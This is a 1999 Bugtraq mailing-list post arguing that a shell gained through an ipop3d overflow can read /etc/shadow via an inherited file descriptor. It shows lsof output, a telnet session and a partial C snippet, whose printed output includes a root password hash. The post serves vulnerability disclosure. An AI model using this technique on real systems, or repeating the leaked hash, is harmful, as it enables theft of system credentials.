Bugtraq mailing list archives

Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight

From: woloszyn () it pl (M.C.Mar)
Date: Thu, 8 Apr 1999 16:39:30 +0200


On Tue, 6 Apr 1999, Stefan Rompf wrote:

Hello Michal,

At 01:41 07.03.99 +0100, you wrote:

Exploited overflow in ipop3d could be used to gain superuser access (the
only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).


Fortunately, you are wrong here. Quoting from the Solaris' setuid() manpage:

    If the effective user ID of the process calling setuid()  is
    the  super-user, the real, effective, and saved user IDs are
    set to the uid parameter.

Linux behaves the same way, IMHO this is defined in POSIX.

But, (un)fortunately when exploiting ipop3d I found something like this:

Grabarz:~emsi# lsof -n | grep 1190
sh        1190 emsi  cwd    DIR        8,1    1024        2 /
sh        1190 emsi  rtd    DIR        8,1    1024        2 /
sh        1190 emsi  txt    REG        8,1  279352    16324 /bin/bash
sh        1190 emsi  mem    REG        8,1   78828    30629 /lib/ld-linux.so.1.9.5
sh        1190 emsi  mem    REG        8,1   11493    79564 /lib/libtermcap.so.2.0.8
sh        1190 emsi  mem    REG        8,1  605044    79566 /lib/libc.so.5.4.33
[...]
sh        1190 emsi    3r   REG        8,1     598    24674 /etc/shadow

Shel spawned via ipop3d explotation (no bonus -- no exploit core) inherits
opened fd :)

So we may do something like this:

emsi:~emsi# telnet grabarz 110
Trying 192.168.0.19...
Connected to grabarz.
Escape character is '^]'.
+OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to MRC () CAC Washington EDU) at Fri, 9 Apr 1999 15:19:33 +0000 (   )
user emsi
+OK User name accepted, password please
pass qpqp01
id;
uid=1002(emsi) gid=100(users) groups=100(users)
: command not found
bash -i;
bash$ cd ~emsi
cd ~emsi
bash$
bash$ cat p.c
cat p.c
        char buf[255];
        lseek(3,0,0);
        read(3,buf,255);
        printf("Be my guest:\n%s\n",buf);
}
bash$
bash$ gcc p.c
gcc p.c
bash$
./a.out
Be my guest:
root:csKcGWMEUMGUs:10539:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
sync:*:9797:0:::::
bin:*:9797:0:::::
ftp:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
mail:*:9797:0:::::
postmaster:*:9797:0:::::
new¿¤þ^
`
bash$
bash$

That's only example... It proofs that exploiting ipop3d could be usefull
to obtain root (or any other account) access and that the vulnerability
should be fixed.

P.S.
Greetings Lam3rZ Group, 3Kombajd_do_czere¶ni testers and Lcamtuf (ty lamo,
czy wkoñcu pode¶lesz mi ten txt co mi obieca³e¶? ;).

--
___________________________________________________________________________
M.C.Mar   An NT server can be run by an idiot, and usually is.   emsi () it pl
      "If you can't make it good, make it LOOK good." - Bill Gates
  Moze to nie miejsce, ale tak np. programy M$ to swoiste pomniki glupoty.

Current thread:

Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight, (continued)
- - - Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Miguel de Icaza (Apr 11)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Miguel de Icaza (Apr 05)
- Multiple WinGate Vulnerabilities[Tad late] Marc (Apr 05)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Stefan Rompf (Apr 06)
  - Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Viktor Fougstedt (Apr 07)
    - security hole (READ AS: security chasm) in ICQ-Webserver DaChronic (Apr 07)
    - Re: security hole (READ AS: security chasm) in ICQ-Webserver sven () MSC-MEDIA COM (Apr 08)
    - Bug in Winroute 3.04g Michael R. Rudel (Apr 08)
    - Re: Bug in Winroute 3.04g Max Vision (Apr 09)
    - Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Casper Dik (Apr 08)
  - Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight M.C.Mar (Apr 08)
- ALERT: No viruses in Acrobat Reader Sarah Rosenbaum (Apr 08)